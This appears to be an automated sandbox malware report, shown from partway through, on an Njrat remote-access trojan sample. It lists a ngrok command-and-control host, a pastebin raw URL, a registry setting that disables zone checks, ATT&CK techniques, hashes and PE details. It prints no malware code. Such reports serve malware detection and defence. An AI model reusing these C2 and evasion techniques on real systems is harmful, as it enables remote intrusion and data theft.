Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\G1lnGpOLK4.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disables zone checking for all users

Source: C:\Users\user\Desktop\G1lnGpOLK4.exe

Registry value created: HKEY_CURRENT_USER\Environment SEE_MASK_NOZONECHECKS

Jump to behavior

Source: G1lnGpOLK4.exe, 00000000.00000002.4072983013.00000000030A1000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: Wireshark.exe

Stealing of Sensitive Information

Yara detected Njrat

Source: Yara match	File source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.G1lnGpOLK4.exe.1390000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.4074957187.00000000130AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: G1lnGpOLK4.exe PID: 2472, type: MEMORYSTR

Remote Access Functionality

Yara detected Njrat

Source: Yara match	File source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.G1lnGpOLK4.exe.1390000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.4074957187.00000000130AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: G1lnGpOLK4.exe PID: 2472, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Service Execution	1 Windows Service	1 Windows Service	31 Disable or Modify Tools	1 Input Capture	1 Query Registry	Remote Services	1 Input Capture	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	12 Process Injection	31 Virtualization/Sandbox Evasion	LSASS Memory	111 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	12 Process Injection	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Obfuscated Files or Information	NTDS	31 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Software Packing	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	2 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	12 System Information Discovery	VNC	GUI Input Capture	13 Application Layer Protocol	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
G1lnGpOLK4.exe	68%	ReversingLabs	ByteCode-MSIL.Backdoor.Bladabhindi
G1lnGpOLK4.exe	71%	Virustotal		Browse
G1lnGpOLK4.exe	100%	Avira	TR/Dropper.Gen
G1lnGpOLK4.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
0.tcp.eu.ngrok.io	16%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
0.tcp.eu.ngrok.io	0%	Avira URL Cloud	safe
0.tcp.eu.ngrok.io	16%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.google.com	142.251.40.228	true	false		high
pastebin.com	104.20.3.235	true	false		high
0.tcp.eu.ngrok.io	18.192.31.165	true	true	16%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://www.google.com/async/newtab_promos	false		high
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw	false		high
https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0	false		high
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGPufzLEGIjDTt_akc_527nJ4zoGCbAZn0AkDcVIV2VLuAM78mz4Tuc4onQdlIzVDE6yNOrZBZH0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM	false		high
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGPufzLEGIjDqkokB_Yx903z9S8-TdyWhW8iPlrZBrgRiiMPzrxlLxgoQH634QKXADTY9t1vdNmMyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM	false		high
https://pastebin.com/raw/s4TipmJt	false		high
0.tcp.eu.ngrok.io	true	16%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://pastebin.com	G1lnGpOLK4.exe, 00000000.00000002.4072983013.00000000030A1000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.20.3.235	pastebin.com	United States	13335	CLOUDFLARENETUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
3.124.142.205	unknown	United States	16509	AMAZON-02US	false
18.192.31.165	0.tcp.eu.ngrok.io	United States	16509	AMAZON-02US	true
142.251.40.228	www.google.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.4

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1435109
Start date and time:	2024-05-02 06:00:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 6s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	G1lnGpOLK4.exe renamed because original name is a hash value
Original Sample Name:	97d72efbb1f6fea3f158b136c330689d.exe
Detection:	MAL
Classification:	mal100.phis.troj.spyw.evad.winEXE@37/7@13/6
EGA Information:	Failed
HCA Information:	Successful, ratio: 97% Number of executed functions: 23 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.72.99, 142.251.40.206, 172.253.122.84, 34.104.35.123, 72.21.81.240, 192.229.211.108, 142.251.40.99, 142.251.40.174
Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, clients2.google.com, ocsp.digicert.com, accounts.google.com, edgedl.me.gvt1.com, slscr.update.microsoft.com, update.googleapis.com, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target G1lnGpOLK4.exe, PID 2472 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
06:01:01	API Interceptor	20x Sleep call for process: powershell.exe modified
06:01:46	API Interceptor	846949x Sleep call for process: G1lnGpOLK4.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.20.3.235	[V2]launcher.exe	Get hash	malicious	PureLog Stealer, RedLine, Xmrig	Browse
	0ED4nPDjeo.exe	Get hash	malicious	RedLine, SectopRAT	Browse
	VOrqSh1Fts.exe	Get hash	malicious	Neoreklami, PureLog Stealer	Browse
	Hapril-29-receipt.vbs	Get hash	malicious	Remcos	Browse
	Hapril-29-receipt.vbs	Get hash	malicious	Remcos	Browse
	IDM Trial Reset.exe	Get hash	malicious	Unknown	Browse
	s8veIRIGWR.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse
	file.exe	Get hash	malicious	Glupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse
	file.exe	Get hash	malicious	Glupteba, Mars Stealer, PureLog Stealer, Vidar, zgRAT	Browse
	c3nBx2HQG2.exe	Get hash	malicious	Glupteba, Mars Stealer, Phorpiex, PureLog Stealer, Stealc, Vidar, zgRAT	Browse
239.255.255.250	https://www.postermywall.com/index.php/posterbuilder/view/2ce9c49c8ff31b813c516187dd74b5b6/0	Get hash	malicious	HTMLPhisher	Browse
	http://www.multipli.com.au	Get hash	malicious	Unknown	Browse
	https://icobath.filecloudonline.com/url/axbhz4sjfzebth22?shareto=finance@loans.company.com	Get hash	malicious	Unknown	Browse
	Order Request1_5_24.xlam.xlsx	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine	Browse
	202404294766578200.xlam.xlsx	Get hash	malicious	Remcos	Browse
	7sYKxZWLgw.exe	Get hash	malicious	PureLog Stealer	Browse
	Account report (1).docx	Get hash	malicious	Unknown	Browse
	Account report (1).docx	Get hash	malicious	Unknown	Browse
	Account report (1).docx	Get hash	malicious	Unknown	Browse
	Account report (1).docx	Get hash	malicious	Unknown	Browse
3.124.142.205	xaa.doc.docx	Get hash	malicious	CVE-2021-40444	Browse	259f-88-231-63-13.eu.ngrok.io/
18.192.31.165	muyq8X8qXp.exe	Get hash	malicious	Unknown	Browse	3eae-79-191-34-149.eu.ngrok.io/sysvndump/send

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
pastebin.com	[V2]launcher.exe	Get hash	malicious	PureLog Stealer, RedLine, Xmrig	Browse	104.20.3.235
	0ED4nPDjeo.exe	Get hash	malicious	RedLine, SectopRAT	Browse	104.20.3.235
	1nS3mkPS10.exe	Get hash	malicious	LimeRAT	Browse	104.20.4.235
	Tapril-30-receipt.vbs	Get hash	malicious	Remcos	Browse	172.67.19.24
	Tapril-30-receipt.vbs	Get hash	malicious	Remcos	Browse	172.67.19.24
	prnportccy.vbs	Get hash	malicious	FormBook	Browse	172.67.19.24
	Demand Q2-2024.xlsx	Get hash	malicious	Unknown	Browse	104.20.3.235
	Inquiry HA-22-28199 22-077.xlsx	Get hash	malicious	Unknown	Browse	172.67.19.24
	Hapril-29-receipt.vbs	Get hash	malicious	Remcos	Browse	104.20.3.235
	Hapril-29-receipt.vbs	Get hash	malicious	Remcos	Browse	104.20.3.235
0.tcp.eu.ngrok.io	1nS3mkPS10.exe	Get hash	malicious	LimeRAT	Browse	3.124.142.205
	MFs7p6ab7w.exe	Get hash	malicious	Njrat	Browse	18.192.31.165
	jpGSWjSTSw.exe	Get hash	malicious	Njrat	Browse	3.124.142.205
	KvS2rT08PQ.exe	Get hash	malicious	Blank Grabber, Njrat, Umbral Stealer	Browse	18.158.249.75
	lLX6Po7hFJ.exe	Get hash	malicious	Nanocore	Browse	3.125.223.134
	aXDh3Stgy2.exe	Get hash	malicious	Njrat	Browse	18.158.249.75
	9VnALqFMbF.exe	Get hash	malicious	DarkComet	Browse	3.125.209.94
	AKsHpy5O2W.exe	Get hash	malicious	Njrat	Browse	3.125.223.134
	D6p5mclMzu.exe	Get hash	malicious	Njrat	Browse	3.124.142.205
	P1Oyl92c7q.exe	Get hash	malicious	Njrat	Browse	3.124.142.205

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://www.postermywall.com/index.php/posterbuilder/view/2ce9c49c8ff31b813c516187dd74b5b6/0	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	http://www.multipli.com.au	Get hash	malicious	Unknown	Browse	104.26.9.44
	https://icobath.filecloudonline.com/url/axbhz4sjfzebth22?shareto=finance@loans.company.com	Get hash	malicious	Unknown	Browse	104.16.117.116
	Account report (1).docx	Get hash	malicious	Unknown	Browse	104.18.91.62
	Account report (1).docx	Get hash	malicious	Unknown	Browse	104.18.89.62
	Account report (1).docx	Get hash	malicious	Unknown	Browse	104.18.89.62
	Account report (1).docx	Get hash	malicious	Unknown	Browse	104.17.25.14
	Signature requested-Fiona QR.png	Get hash	malicious	HTMLPhisher	Browse	1.1.1.1
	file.exe	Get hash	malicious	GuLoader, PXRECVOWEIWOEI Stealer	Browse	104.16.185.241
	NOA.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
AMAZON-02US	https://www.postermywall.com/index.php/posterbuilder/view/2ce9c49c8ff31b813c516187dd74b5b6/0	Get hash	malicious	HTMLPhisher	Browse	108.138.106.124
	http://www.multipli.com.au	Get hash	malicious	Unknown	Browse	13.225.63.120
	https://icobath.filecloudonline.com/url/axbhz4sjfzebth22?shareto=finance@loans.company.com	Get hash	malicious	Unknown	Browse	108.128.23.94
	Account report (1).docx	Get hash	malicious	Unknown	Browse	52.217.132.152
	Account report (1).docx	Get hash	malicious	Unknown	Browse	52.214.160.103
	Account report (1).docx	Get hash	malicious	Unknown	Browse	52.214.160.103
	Account report (1).docx	Get hash	malicious	Unknown	Browse	52.217.103.216
	Arrival Notice.xls	Get hash	malicious	Unknown	Browse	76.76.21.21
	Arrival Notice.xls	Get hash	malicious	Unknown	Browse	76.76.21.21
	Arrival Notice.xls	Get hash	malicious	Unknown	Browse	76.76.21.21
AMAZON-02US	https://www.postermywall.com/index.php/posterbuilder/view/2ce9c49c8ff31b813c516187dd74b5b6/0	Get hash	malicious	HTMLPhisher	Browse	108.138.106.124
	http://www.multipli.com.au	Get hash	malicious	Unknown	Browse	13.225.63.120
	https://icobath.filecloudonline.com/url/axbhz4sjfzebth22?shareto=finance@loans.company.com	Get hash	malicious	Unknown	Browse	108.128.23.94
	Account report (1).docx	Get hash	malicious	Unknown	Browse	52.217.132.152
	Account report (1).docx	Get hash	malicious	Unknown	Browse	52.214.160.103
	Account report (1).docx	Get hash	malicious	Unknown	Browse	52.214.160.103
	Account report (1).docx	Get hash	malicious	Unknown	Browse	52.217.103.216
	Arrival Notice.xls	Get hash	malicious	Unknown	Browse	76.76.21.21
	Arrival Notice.xls	Get hash	malicious	Unknown	Browse	76.76.21.21
	Arrival Notice.xls	Get hash	malicious	Unknown	Browse	76.76.21.21

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	https://icobath.filecloudonline.com/url/axbhz4sjfzebth22?shareto=finance@loans.company.com	Get hash	malicious	Unknown	Browse	104.118.8.139 40.68.123.157
	Account report (1).docx	Get hash	malicious	Unknown	Browse	104.118.8.139 40.68.123.157
	Account report (1).docx	Get hash	malicious	Unknown	Browse	104.118.8.139 40.68.123.157
	IP #U00c1#U00d6#U00bc#U00d2 #U00ba#U00af#U00b0#U00e6.exe	Get hash	malicious	Unknown	Browse	104.118.8.139 40.68.123.157
	SecuriteInfo.com.Program.Unwanted.4826.21447.30958.exe	Get hash	malicious	Unknown	Browse	104.118.8.139 40.68.123.157
	IP #U00c1#U00d6#U00bc#U00d2 #U00ba#U00af#U00b0#U00e6.exe	Get hash	malicious	Unknown	Browse	104.118.8.139 40.68.123.157
	HZkU6Q8hA7.exe	Get hash	malicious	Unknown	Browse	104.118.8.139 40.68.123.157
	https://pub-db1a408105854b1d82b99dbe410de97e.r2.dev/index.html	Get hash	malicious	Unknown	Browse	104.118.8.139 40.68.123.157
	https://www.bjvpza.cn/	Get hash	malicious	Unknown	Browse	104.118.8.139 40.68.123.157
	https://vpassz.xu4nblog.com/	Get hash	malicious	Unknown	Browse	104.118.8.139 40.68.123.157
54328bd36c14bd82ddaa0c04b25ed9ad	SecuriteInfo.com.Program.Unwanted.4826.21447.30958.exe	Get hash	malicious	Unknown	Browse	104.20.3.235
	SecuriteInfo.com.Program.Unwanted.4826.21447.30958.exe	Get hash	malicious	Unknown	Browse	104.20.3.235
	file.exe	Get hash	malicious	GuLoader, PXRECVOWEIWOEI Stealer	Browse	104.20.3.235
	Payment_Advice.exe	Get hash	malicious	Snake Keylogger	Browse	104.20.3.235
	Payment_Advice.scr.exe	Get hash	malicious	Snake Keylogger	Browse	104.20.3.235
	1nS3mkPS10.exe	Get hash	malicious	LimeRAT	Browse	104.20.3.235
	DEKONT.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	104.20.3.235
	https://docs.google.com/presentation/d/e/2PACX-1vRA7cYu2pjKyfaCRROgTu4J2OpPGWE_raEqtGhCVl21QDvJzZsVPQtIU_FG6khcCjqxbwzOTOoBBBx6/pub?start=false&loop=false&delayms=3000&slide=id.p	Get hash	malicious	Unknown	Browse	104.20.3.235
	DEKONT.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	104.20.3.235
	e-dekont.exe	Get hash	malicious	Snake Keylogger	Browse	104.20.3.235

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1510207563435464
Encrypted:	false
SSDEEP:	3:Nlllullkv/tz:NllU+v/
MD5:	6442F277E58B3984BA5EEE0C15C0C6AD
SHA1:	5343ADC2E7F102EC8FB6A101508730898CB14F57
SHA-256:	36B765624FCA82C57E4C5D3706FBD81B5419F18FC3DD7B77CD185E6E3483382D
SHA-512:	F9E62F510D5FB788F40EBA13287C282444607D2E0033D2233BC6C39CA3E1F5903B65A07F85FA0942BEDDCE2458861073772ACA06F291FA68F23C765B0CA5CA17
Malicious:	false
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ojnmq5j.r54.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ed1lrobr.tzh.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mf1svetu.2wj.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wqnjg344.x0n.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Chrome Cache Entry: 51

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (3295)
Category:	downloaded
Size (bytes):	3300
Entropy (8bit):	5.866377899275874
Encrypted:	false
SSDEEP:	96:PMIBef+li0TZNHcSLVoKoHslPgMd67REaT2WVywa7B9MfQfffo:kMecHNL2KusuRZT/BSB9O
MD5:	FE93149FE2F21EC362FE4375A67BCAD2
SHA1:	D4D75C91EF6E97D166C885E5F6D5382A0D580344
SHA-256:	CFD3AB8EB18109A9F14B29BD474E7F5C239D396980F3E7EDA773C7B0B63C470A
SHA-512:	ED2E04005CCF82F87E4B1EF58C1B9D85E98EF69211E64920D033B152202E483DE43623EB5DACB91D82BC0C57E89A214B3B7F87225F4DD8F47AA7360B0CD61200
Malicious:	false
URL:	https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
Preview:	)]}'.["",["troy moran hart high school principal","amd stocks","dodgers baseball","today wordle answer","tag heuer formula 1 kith","concert week $25 tickets","google layoffs today","bj west denver broncos"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"google:entityinfo":"CggvbS8wNG1qbBINQmFzZWJhbGwgdGVhbTLmDWRhdGE6aW1hZ2UvcG5nO2Jhc2U2NCxpVkJPUncwS0dnb0FBQUFOU1VoRVVnQUFBRDRBQUFCQUNBTUFBQUIxTnpUSEFBQUFuMUJNVkVYLy8vOEFVcGdBVUpjQVJwTUFQNUFBU1pRQVRaWUFSSklBUVpFQVY1dUpvOFFBT283cjcvVUFTNVVBT0kzMTkvcnhYRi81dzhTYXNNeG5pN2FudXRKS2VLenpmWC96Z1lQOTZ1cjNyN0Q4MzkvNHQ3ais4L1B2UWtiKytmblMyK2ZkNCsxems3dXh3ZGU2eU5zM2JhYjcxZFh3U1UzMW5KMzZ6czd5Ykc3MnA2ajBqcEJiZzdMSDB1SWNZWjk4bXIvc0FBRHVIQ1B3VVZVQU1JcnlkSGJETzVYOUFBQUVOa2xFUVZSSWlhVlhqWHFxT0JBZENBRVNRQlRCVW9yeVc3RVdjTGYxL1o5dEp3blEyNzFWMGM2bkJqRW5Nem5uSkVHQU9YRmNMcGZuMTFsZC80NWt2OGZQOUduekVEcmR3bE1zTHA3Zkg0RnZFb

Static File Info

General

File type:	MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
Entropy (8bit):	7.753817895112134
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	G1lnGpOLK4.exe
File size:	68'951 bytes
MD5:	97d72efbb1f6fea3f158b136c330689d
SHA1:	43c884250ed032ced44d72d932518e831a34161d
SHA256:	2ff91319fbcc02e9dd7d80e21f5f7f48e0ae24b99a1b26625d344ab4812f37c4
SHA512:	a9937e30d19ebf33ebe4c20792f7499e79996f06b5e3bc6f28d506ba4440640ebc923d424184007f2f111c3706876c029f6d4e41d5ed144c2b8e666b32689596
SSDEEP:	1536:uuKlhoxbyGiiKkTvTiCUU8b+a1fJ3l4fLU2cjdFZPvf9G95T8KCc4:NKOyGxKIiCV8aa1fJV4zMF54ra
TLSH:	21630246E7E4D32CC0648F774BC5839B0A28C79453B70F172DF868826D576525AA73E2
File Content Preview:	MZ@.....................................!..L.!It's .NET EXE$@...PE..L....&.M............................^.... ...@....@.. ....................................@.....................................O....@..4..................................................

File Icon


Icon Hash:	2dd2d2b3a46c9975

Static PE Info

General

Entrypoint:	0x402e5e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x4D0126CB [Thu Dec 9 18:58:19 2010 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
